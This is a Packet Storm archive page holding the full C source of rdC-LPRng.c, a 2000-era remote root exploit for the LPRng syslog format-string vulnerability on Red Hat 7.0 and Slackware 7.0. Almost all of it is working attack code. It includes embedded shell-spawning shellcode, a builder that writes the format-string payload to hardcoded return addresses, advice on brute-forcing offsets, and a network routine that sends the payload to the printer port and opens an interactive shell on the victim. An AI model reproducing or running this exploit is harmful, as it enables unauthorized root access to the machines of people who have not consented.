exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rdC-LPRng.c

rdC-LPRng.c
Posted Dec 15, 2000
Authored by venomous | Site rdcrew.com.ar

LPRng v3.6.24 and below remote root exploit for Linux/x86 which exploits the syslog() format string vulnerability. Tested against the default install of Redhat 7.0 (LPRng-3.6.24-1) and LPRng3.6.22-1 installed on Slackware 7.0.

tags | exploit, remote, x86, root
systems | linux, redhat, slackware
SHA-256 | 711ec9e53d55297ca043c724b126975613590c27a195978efaf80054e1390558

rdC-LPRng.c

Change Mirror Download
/*
* REMOTE ROOT EXPLOIT for linux x86 - LPRng-3.6.24-1 (RedHat 7.0)
*
* The RedHat 7.0 replaced the BSD lpr with the LPRng package which is
* vulnerable to format string attacks because it passes information
* to the syslog incorrectly.
* You can get remote root access on machines running RedHat 7.0 with
* lpd running (port 515/tcp) if it is not fixed, of course (3.6.25).
*
* bonus: I tested it too on slackware 7.0 with LPRng3.6.22-1, remember
* is -not- installed by default (isnt a package of the slackware).
*
* and,.. this code is for educational propourses only, do not use
* it on remote machines without authorization.
*
* greets: bruj0, ka0z, dn0, #rdC and #flatline
*
* coded by venomous of rdC - Argentinian security group.
* venomous@rdcrew.com.ar
* http://www.rdcrew.com.ar
*
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <signal.h>

char shellcode[]= // not mine
"\x31\xc0\x31\xdb\x31\xc9\xb3\x07\xeb\x67\x5f\x8d\x4f"
"\x07\x8d\x51\x0c\x89\x51\x04\x8d\x51\x1c\x89\x51\x08"
"\x89\x41\x1c\x31\xd2\x89\x11\x31\xc0\xc6\x41\x1c\x10"
"\xb0\x66\xcd\x80\xfe\xc0\x80\x79\x0c\x02\x75\x04\x3c"
"\x01\x74\x0d\xfe\xc2\x80\xfa\x01\x7d\xe1\x31\xc0\xfe"
"\xc0\xcd\x80\x89\xd3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80"
"\xfe\xc1\x80\xf9\x03\x75\xf3\x89\xfb\x31\xc0\x31\xd2"
"\x88\x43\x07\x89\x5b\x08\x8d\x4b\x08\x89\x43\x0c\xb0"
"\x0b\xcd\x80\x31\xc0\xfe\xc0\xcd\x80\xe8\x94\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68";

void usage(char *prog);
void makebuffer(char *addr, char *shaddr, int addroffset, int shoffset, int padding , int fsc);
void sigint();
void sigalarm();
void mk_connect(char victim[128], int port);

char yahoo[1024];

struct os
{
char *addr;
char *shelladdr;
char *desc;
int addroffset;
int shelladdroffset;
int pad;
int fsc;
};

/* generally, the addresses are wrong for a very small value,, i recommend
* that you bruteforce the retloc + or - by 1..(ex: -50 to +50, steps of 1)
* if it dont work, try the same but changing the fsc (this is the value
* of when we start to control the formats strings), start from 290 until
* 330, it should be enough.
* and if it still dont work,, :|, try with the offset of the shellcode
* address, this buffer has nops, so it shouldnt be difficult to guess.
* make a .sh! :)
* of course, you can start gdb on your box(es) and dont guess nothing
* just inspect the program and get the correct values!
*
* -venomous
*/

struct os target[]=
{
{"0xbfffee30", "0xbffff640", "Slackware 7.0 with LPRng-3.6.22.tgz - started from shell", 0, 0, 2, 299},
{"0xbffff0f0", "0xbffff920", "RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5", 0, 0, 2, 304},
{NULL,NULL,NULL,0,0}
};


main(int argc, char *argv[])
{
int port=515,
so=0,
padding=0,
retlocoffset=0,
shellcodeoffset=0,
fscT=0;

char arg,
victim[128],
rl[128],
sh[128];


if(argc < 3)
usage(argv[0]);

bzero(victim,sizeof(victim));
bzero(rl,sizeof(rl));
bzero(sh,sizeof(sh));

while ((arg = getopt(argc, argv, "h:p:r:s:t:P:R:S:c")) != EOF)
{
switch(arg)
{
case 'h':
strncpy(victim,optarg,128);
break;
case 'p':
port = atoi(optarg);
break;
case 'r':
strncpy(rl,optarg,128);
break;
case 's':
strncpy(sh,optarg,128);
break;
case 't':
so = atoi(optarg);
break;
case 'P':
padding = atoi(optarg);
break;
case 'R':
retlocoffset = atoi(optarg);
break;
case 'S':
shellcodeoffset = atoi(optarg);
break;
case 'c':
fscT = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

if(strlen(victim) == 0)
usage(argv[0]);

if (strcmp(rl,""))
target[so].addr = rl;

if (strcmp(sh,""))
target[so].shelladdr = sh;

if (retlocoffset != 0)
target[so].addroffset = target[so].addroffset + retlocoffset;

if (shellcodeoffset != 0)
target[so].shelladdroffset = target[so].shelladdroffset + shellcodeoffset;

if (padding != 0)
target[so].pad = target[so].pad + padding;

if (fscT != 0)
target[so].fsc = target[so].fsc + fscT;

signal(SIGINT, sigint);
makebuffer(target[so].addr, target[so].shelladdr, target[so].addroffset, target[so].shelladdroffset, target[so].pad, target[so].fsc);
mk_connect(victim, port);

}

void makebuffer(char *addr, char *shaddr, int addroffset, int shoffset, int padding, int fsc)
{
char *tmp,
addrtmp[216],
ot[128];

int i,b,x,t;
unsigned long pt;

char temp[128];
char a1,a2,a3,a4,a5,a6,a7,a8;
char fir[12],sec[12],thr[12],f0r[12];
unsigned long firl,secl,thrl,forl;
unsigned long pas1,pas2,pas3,pas4;


bzero(yahoo,sizeof(yahoo));
bzero(ot,sizeof(ot));
bzero(addrtmp,sizeof(addrtmp));

printf("** LPRng remote root exploit coded by venomous of rdC **\n");
printf("\nconstructing the buffer:\n\n");
printf("adding bytes for padding: %d\n",padding);
for(i=0 ; i < padding ; i++)
strcat(yahoo,"A");

tmp = addr;
pt = strtoul(addr, &addr,16) + addroffset;
addr = tmp;
printf("retloc: %s + offset(%d) == %p\n", addr, addroffset, pt);
printf("adding resulting retloc(%p)..\n",pt);
sprintf(addrtmp, "%p", pt);
if(strlen(addr) != 10)
{
printf("Error, retloc is %d bytes long, should be 10\n",strlen(addr));
exit(1);
}

pt = 0;

for (i=0 ; i < 4 ; i++)
{
pt = strtoul(addrtmp, &addrtmp, 16);
//strcat(yahoo, &pt);
bzero(ot,sizeof(ot));
sprintf(ot,"%s",&pt);
strncat(yahoo,ot,4);
pt++;
sprintf(addrtmp, "%p", pt);
//printf("addrtmp:%s :yahoo %s\n",addrtmp,yahoo);
}

tmp = shaddr;
pt = 0;
pt = strtoul(shaddr,&shaddr,16) + shoffset;
sprintf(ot,"%p",pt);
shaddr = ot;

printf("adding shellcode address(%s)\n", shaddr);
sscanf(shaddr,"0x%c%c%c%c%c%c%c%c",&a1,&a2,&a3,&a4,&a5,&a6,&a7,&a8);

sprintf(fir,"0x%c%c",a1,a2);
sprintf(sec,"0x%c%c",a3,a4);
sprintf(thr,"0x%c%c",a5,a6);
sprintf(f0r,"0x%c%c",a7,a8);

firl = strtoul(fir,&fir,16);
secl = strtoul(sec,&sec,16);
thrl = strtoul(thr,&thr,16);
forl = strtoul(f0r,&f0r,16);

pas1 = forl - 50 - padding;
pas1 = check_negative(pas1);

pas2 = thrl - forl;
pas2 = check_negative(pas2);

pas3 = secl - thrl;
pas3 = check_negative(pas3);

pas4 = firl - secl;
pas4 = check_negative(pas4);

sprintf(temp,"%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",pas1,fsc, pas2, fsc+1, pas3, fsc+2,pas4, fsc+3);
strcat(yahoo,temp);

printf("adding nops..\n");
b = strlen(yahoo);
for (i=0 ; i < (512-b-strlen(shellcode)) ; i++)
yahoo[b+i] = '\x90';

printf("adding shellcode..\n");
b=+i;
for (x=0 ; x < b ; x++)
yahoo[b+x] = shellcode[x];

strcat(yahoo,"\n");

printf("all is prepared.. now lets connect to something..\n");

}

check_negative(unsigned long addr)
{
char he[128];

sprintf(he,"%d",addr);
if (atoi(he) < 0)
addr = addr + 256;
return addr;
}

void mk_connect(char victim[128], int port)
{
struct hostent *host;
struct sockaddr_in den0n;
int sox;

den0n.sin_family = AF_INET;
den0n.sin_port = htons(port);

host = gethostbyname(victim);
if (!host)
{
printf("cannot resolve, exiting...\n");
exit(0);
}

bcopy(host->h_addr, (struct in_addr *)&den0n.sin_addr, host->h_length);

sox = socket(AF_INET, SOCK_STREAM, 0);

signal(SIGALRM, sigalarm);
alarm(10);

printf("connecting to %s to port %d\n",host->h_name, port);
if (connect(sox, (struct sockaddr *)&den0n, sizeof(struct sockaddr)) < 0)
{
putchar('\n');
perror("connect");
exit(1);
}
printf("connected!, sending the buffer...\n\n");
write(sox, yahoo , strlen(yahoo));
printf("%s\n", yahoo);
sleep(1);
alarm(0);
runshell(sox);
}

int runshell(int sox)
{
fd_set rset;
int n;
char buffer[4096];

char *command="/bin/uname -a ; /usr/bin/id\n";


send(sox, command, strlen(command), 0);

for (;;) {
FD_ZERO (&rset);
FD_SET (sox, &rset);
FD_SET (STDIN_FILENO, &rset);

n = select(sox + 1, &rset, NULL, NULL, NULL);
if(n <= 0)
return (-1);

if(FD_ISSET (sox, &rset)) {
n = recv (sox, buffer, sizeof (buffer), 0);
if (n <= 0)
break;

write (STDOUT_FILENO, buffer, n);
}

if(FD_ISSET (STDIN_FILENO, &rset)) {
n = read (STDIN_FILENO, buffer, sizeof (buffer));
if (n <= 0)
break;

send(sox, buffer, n, 0);
}
}
return (0);
}

void sigalarm()
{
printf("connection timed out, exiting...\n");
exit(0);
}

void sigint()
{
printf("CAUGHT sigint, exiting...\n");
exit(0);
}


void usage(char *prog)
{
int i;

printf("\n** LPRng remote root exploit coded by venomous of rdC **\n");
printf("Usage:\n\n");
printf("%s [-h hostname] <-p port> <-r addr> <-s shellcodeaddr> <-t type> <-P padding> <-R offset> <-S offset> <-c offset>\n\n", prog);
printf("-h is the victim ip/host\n");
printf("-p select a different port to connect, default 515\n");
printf("-r is the address to overwrite\n");
printf("-s is the address of the shellcode\n");
printf("You can use a predefined addr/shellcodeaddr using -t <number>\n\n");
printf("availables types:\n\n");
for (i=0 ; target[i].desc != NULL ; i++)
printf("%d - %s\n",i,target[i].desc);
printf("\n-P is to define the padding to use, usually 2\n");
printf("-R the offset to add to <addr>\n");
printf("-S the offset to add to <shellcodeaddr>\n");
printf("-c where we start to control the format string\n\n");
exit(0);
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close